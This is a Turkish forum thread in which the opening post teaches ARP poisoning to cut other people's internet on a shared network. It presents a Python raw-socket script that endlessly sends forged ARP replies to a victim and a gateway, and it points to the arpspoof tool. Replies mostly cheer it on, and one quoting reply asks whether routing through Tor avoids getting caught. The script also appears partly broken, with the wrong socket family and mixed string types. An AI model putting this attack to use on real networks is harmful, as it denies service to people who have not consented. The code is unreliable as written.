Kablolu veya Kablosuz farketmez internetten düşürmeden insanların internetini kesme (Arp Poisoning / Spoofing)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Uzman Üye
Ödüller
4
6 HİZMET YILI
Önemli NOT: Teknik olarak bu işlem bir saldırı olup kendinize ait olmayan bir ağ üzerinde yapıp yakalanırsanız 2-4 yıl arası yargılanabilirsiniz. Saldırının dezavantajı, işi bilen kişiye karşı kendi kimliğinizi kabak gibi ortada bırakıyor. Kendi evinizde yapın başkasına bulaşmayın !!!
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.

Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.

Python kodu:

Python:
import socket

import struct

import binascii

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))

s.bind(("eth0", socket.htons(0x0800)))

#Saldırgan mac, kurban mac, router mac (Kendinize göre editleyin)

attckmac = '\xff\xff\xff\xff\xff\xff'

victimmac = '\xff\xff\xff\xff\xff\xff'

gatewaymac = '\xff\xff\xff\xff\xff\xff'

code = '\x08\x06'

ethernet1 = victimmac + attckmac + code

ethernet2 = gatewaymac + attckmac + code

htype = '\x00\x01'

protype = '\x08\x00'

hsize = '\x06'

psize = '\x04'

opcode = '\x00\x02'

#Kurban ip, yeni gateway ip

gateway_ip = '192.168.1.x'

victim_ip = '192.168.1.x'

gatewayip = socket.inet_aton ( gateway_ip )

victimip = socket.inet_aton ( victim_ip )

victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip

gateway_ARP = ethernet2 + htype + protype + hsize + psize + opcode + attckmac + victimip + gatewaymac + gatewayip

while 1:

s.send(victim_ARP)

s.send(gateway_ARP)

Bu kodları sadece eğitim amaçlı kullanınız.

Moderatörün son düzenlenenleri:
Seçkin Üye
8 HİZMET YILI
bu tamamen kötü amaç için kullanılmaz umarım

Seçkin Üye
6 HİZMET YILI
cidden detaylı bir anlatım ve güzel bir konu olmuş teşekkürler arkadaşım kendi evimde kesinlikle deniyecegim zaten başka şeyler yapmayada gerek yok

Uzman Üye
7 HİZMET YILI
evde iki tane genç olursa illa yapılacaktır böyle çözümler

Seçkin Üye
6 HİZMET YILI
işe çok yarar ama kötü bi amaçla kullanılırsa kötü bir şey.

Uzman Üye
Ödüller
4
6 HİZMET YILI
Onaylı Üye
Ödüller
8
9 HİZMET YILI
İşe yarar fakat bunun kullanılırsa gerçekten kötü sebeplere mal olur

✔️ Anı Yaşıyorum ✔️
Süper Üye
Ödüller
6
7 HİZMET YILI
Arkadaşda denemek lazım. Başka kişilerde denersek sıkıntıya uğrarız. Teşekürler tam bir şakamatik :D

Süper Üye
Ödüller
2
6 HİZMET YILI
Eyw kardeş arkadaşı trollemek için iyi bir şey :D

Süper Üye
Ödüller
5
6 HİZMET YILI
aga kötü amaçlı gibi duruyo da denemek lazım biriyle saolun

Onaylı Üye
Ödüller
2
6 HİZMET YILI
umarım kötü amaçlı kullanılmaz yararlı bi post olmuş teşekkrüler

Btw
Süper Üye
Ödüller
5
7 HİZMET YILI
İşe yarar fakat sakıncalı bir olay .

Tahsin Yavuz
Seçkin Üye
Ödüller
6
Sosyal
8 HİZMET YILI
Önemli NOT: Teknik olarak bu işlem bir saldırı olup kendinize ait olmayan bir ağ üzerinde yapıp yakalanırsanız 2-4 yıl arası yargılanabilirsiniz. Saldırının dezavantajı, işi bilen kişiye karşı kendi kimliğinizi kabak gibi ortada bırakıyor. Kendi evinizde yapın başkasına bulaşmayın !!!
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.

Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.

Python kodu:

Python:
import socket

import struct

import binascii

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))

s.bind(("eth0", socket.htons(0x0800)))

#Saldırgan mac, kurban mac, router mac (Kendinize göre editleyin)

attckmac = '\xff\xff\xff\xff\xff\xff'

victimmac = '\xff\xff\xff\xff\xff\xff'

gatewaymac = '\xff\xff\xff\xff\xff\xff'

code = '\x08\x06'

ethernet1 = victimmac + attckmac + code

ethernet2 = gatewaymac + attckmac + code

htype = '\x00\x01'

protype = '\x08\x00'

hsize = '\x06'

psize = '\x04'

opcode = '\x00\x02'

#Kurban ip, yeni gateway ip

gateway_ip = '192.168.1.x'

victim_ip = '192.168.1.x'

gatewayip = socket.inet_aton ( gateway_ip )

victimip = socket.inet_aton ( victim_ip )

victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip

gateway_ARP = ethernet2 + htype + protype + hsize + psize + opcode + attckmac + victimip + gatewaymac + gatewayip

while 1:

s.send(victim_ARP)

s.send(gateway_ARP)
tor üzerinden yaparsak yakalanma şansımız ?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...